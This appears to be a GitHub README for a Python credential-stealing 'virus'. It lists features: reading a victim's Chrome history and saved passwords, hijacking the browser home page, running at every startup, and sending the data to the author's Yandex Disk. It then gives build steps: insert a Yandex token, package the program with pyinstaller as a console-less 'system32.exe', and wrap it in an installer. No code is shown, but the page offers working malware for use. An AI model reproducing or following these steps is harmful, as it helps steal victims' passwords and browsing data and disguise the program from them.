Skip to content

Latest commit

 

History

History
29 lines (24 loc) · 1.76 KB

README.md

File metadata and controls

29 lines (24 loc) · 1.76 KB

Contents of the Virus

Accessing Chrome History on Opposite Computer
Accessing Chrome Passwords on the Opposite Computer
We change the link of the home page site of the Internet Browser
A specific site opens every time the computer starts
All this data is transferred to our yandex disk
The virus opens automatically and updates the data every time the computer starts.

ATTENTİON

-Chrome must be closed while virus is running

How To editing this virus for me ? follow the steps

-We install the necessary libraries
-Our virus runs with start.py file
-We transfer all the data to our yandex disk so that we can see it ourselves, we do this by creating our own yandex token
-We do these operations from the yadiskk.py file in 5th line of code
-If you don't know how to create a yandex token watch this video(https://www.youtube.com/watch?v=sc2mZulxdoo)
-Which link you want to open when the computer starts, you can do this by changing the link in the 5th line of the code in the chrome.py file.
-You can do this by changing the link in line 16 of the code in the chrome.py file, whichever link you want the home page of when the computer starts.
-We install the pyinstaller library, then write this in the terminal "-pyinstaller --name=system32 --icon=wolf.ico --noconsole start.py "
-Now our virus starts working by running the system32.exe file in the ready folder
-Let's convert the exe file we created into a setup file using inno setup compiler
-Congratulations you have a professional virus I hope you don't use it for malicious purposes.
-HAVE NİCE DAY!!

Try

-If you want to try the virus I created, Link